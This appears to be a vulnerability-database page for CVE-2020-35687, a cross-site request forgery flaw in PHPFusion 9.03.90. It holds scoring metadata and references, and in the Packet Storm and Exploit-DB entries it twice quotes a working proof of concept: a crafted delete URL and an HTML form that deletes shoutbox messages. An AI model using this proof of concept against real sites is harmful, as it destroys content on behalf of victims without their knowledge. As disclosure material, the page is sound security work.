CVE-2020-35687

2021-01-13T17:15:00

Description

PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim.

Affected Software

CPE Name	Name	Version
php-fusion:phpfusion	php-fusion phpfusion	9.03.90

{"id": "CVE-2020-35687", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-35687", "description": "PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim.", "published": "2021-01-13T17:15:00", "modified": "2021-02-02T17:51:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35687", "reporter": "cve@mitre.org", "references": ["https://github.com/PHPFusion/PHPFusion/issues/2347", "https://www.exploit-db.com/exploits/49426"], "cvelist": ["CVE-2020-35687"], "immutableFields": [], "lastseen": "2022-03-23T17:58:20", "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:02032F86-191F-4F60-B473-DEAA0BCF1D48"]}, {"type": "exploitdb", "idList": ["EDB-ID:49426"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160956"]}], "rev": 4}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:02032F86-191F-4F60-B473-DEAA0BCF1D48"]}], "wildExploited": true}, "score": {"value": 4.7, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-02-02T07:37:07", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1356668478464393218", "text": " NEW: CVE-2020-35687 PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim. Severity: MEDIUM https://t.co/B91JEl8EZS?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1350107747438608386", "text": " NEW: CVE-2020-35687 PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim. Severity: MEDIUM https://t.co/B91JElqfRq?amp=1"}, {"link": "https://twitter.com/digitpol_cyber/status/1350444660557139972", "text": "New post: CVE-2020-35687 PHPFusion \u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e -\u6f0f\u6d1e\u60c5\u62a5\u3001\u6f0f\u6d1e\u8be6\u60c5\u3001\u5b89\u5168\u6f0f\u6d1e\u3001CVE \u2013 \u5b89\u5168\u5ba2\uff0c\u5b89\u5168\u8d44\u8baf\u5e73\u53f0 https://t.co/gW9c81iOsY?amp=1\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6f0f\u6d1e-\u6f0f\u6d1e\u60c5\u62a5\u3001\u6f0f\u6d1e\u8be6\u60c5\u3001\u5b89/"}, {"link": "https://twitter.com/WolfgangSesin/status/1350188540592840708", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-35687 (phpfusion)) has been published on https://t.co/f6GhuKtsWM?amp=1"}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:02032F86-191F-4F60-B473-DEAA0BCF1D48"]}, {"type": "exploitdb", "idList": ["EDB-ID:49426"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160956"]}]}, "vulnersScore": 4.7}, "_state": {"wildexploited": 0, "dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:php-fusion:phpfusion:9.03.90"], "cpe23": ["cpe:2.3:a:php-fusion:phpfusion:9.03.90:*:*:*:*:*:*:*"], "cwe": ["CWE-352"], "affectedSoftware": [{"cpeName": "php-fusion:phpfusion", "version": "9.03.90", "operator": "eq", "name": "php-fusion phpfusion"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:php-fusion:phpfusion:9.03.90:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/PHPFusion/PHPFusion/issues/2347", "name": "https://github.com/PHPFusion/PHPFusion/issues/2347", "refsource": "MISC", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/49426", "name": "https://www.exploit-db.com/exploits/49426", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}

{"packetstorm": [{"lastseen": "2021-01-15T17:31:32", "description": "", "published": "2021-01-15T00:00:00", "type": "packetstorm", "title": "PHP-Fusion 9.03.90 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-35687"], "modified": "2021-01-15T00:00:00", "id": "PACKETSTORM:160956", "href": "https://packetstormsecurity.com/files/160956/PHP-Fusion-9.03.90-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message) \n# Date: 2020-12-21 \n# Exploit Author: Mohamed Oosman B S \n# Vendor Homepage: https://www.php-fusion.co.uk/ \n# Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php \n# Version: 9.03.90 and below \n# Tested on: Windows 10 \n# CVE : CVE-2020-35687 \n \n1. Description: \nPHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim. \n \n2. Proof of Concept \nAs the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly, \nafter getting to know the shout_id of the message, as it is sequential. \n \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php\"> \n<input type=\"hidden\" name=\"s_action\" value=\"delete\" /> \n<input type=\"hidden\" name=\"shout_id\" value=\"3\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160956/phpfusion90390-xsrf.txt"}], "attackerkb": [{"lastseen": "2021-10-22T07:43:07", "description": "PHPFusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of all shoutbox messages by the attacker on behalf of the logged in victim.\n\n \n**Recent assessments:** \n \n**oosman-rak** at January 20, 2021 4:08am UTC reported:\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-01-13T00:00:00", "type": "attackerkb", "title": "CVE-2020-35687", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35687"], "modified": "2021-01-16T00:00:00", "id": "AKB:02032F86-191F-4F60-B473-DEAA0BCF1D48", "href": "https://attackerkb.com/topics/A36Twlwhjn/cve-2020-35687", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-05-13T17:40:38", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2021-01-15T00:00:00", "type": "exploitdb", "title": "PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-35687", "CVE-2020-35687"], "modified": "2021-01-15T00:00:00", "id": "EDB-ID:49426", "href": "https://www.exploit-db.com/exploits/49426", "sourceData": "# Exploit Title: PHP-Fusion CMS 9.03.90 - Cross-Site Request Forgery (Delete admin shoutbox message)\r\n# Date: 2020-12-21\r\n# Exploit Author: Mohamed Oosman B S\r\n# Vendor Homepage: https://www.php-fusion.co.uk/\r\n# Software Link: https://www.php-fusion.co.uk/phpfusion_9_downloads.php\r\n# Version: 9.03.90 and below\r\n# Tested on: Windows 10\r\n# CVE : CVE-2020-35687\r\n\r\n1. Description:\r\nPHP-Fusion version 9.03.90 is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim.\r\n\r\n2. Proof of Concept\r\nAs the requests for deleting the admin shoutbox are sent using the GET method, the CSRF attack to delete an attacker-controlled shoutbox message can be performed by having the admin visit https://TARGET.com/infusions/shoutbox_panel/shoutbox_archive.php?s_action=delete&shout_id=1 directly,\r\nafter getting to know the shout_id of the message, as it is sequential.\r\n\r\n<html>\r\n<body>\r\n<script>history.pushState('', '', '/')</script>\r\n<form action=\"https://TARGET/infusions/shoutbox_panel/shoutbox_archive.php\">\r\n<input type=\"hidden\" name=\"s_action\" value=\"delete\" />\r\n<input type=\"hidden\" name=\"shout_id\" value=\"3\" />\r\n<input type=\"submit\" value=\"Submit request\" />\r\n</form>\r\n</body>\r\n</html>", "sourceHref": "https://www.exploit-db.com/download/49426", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

CVE-2020-35687

Description

Affected Software

Related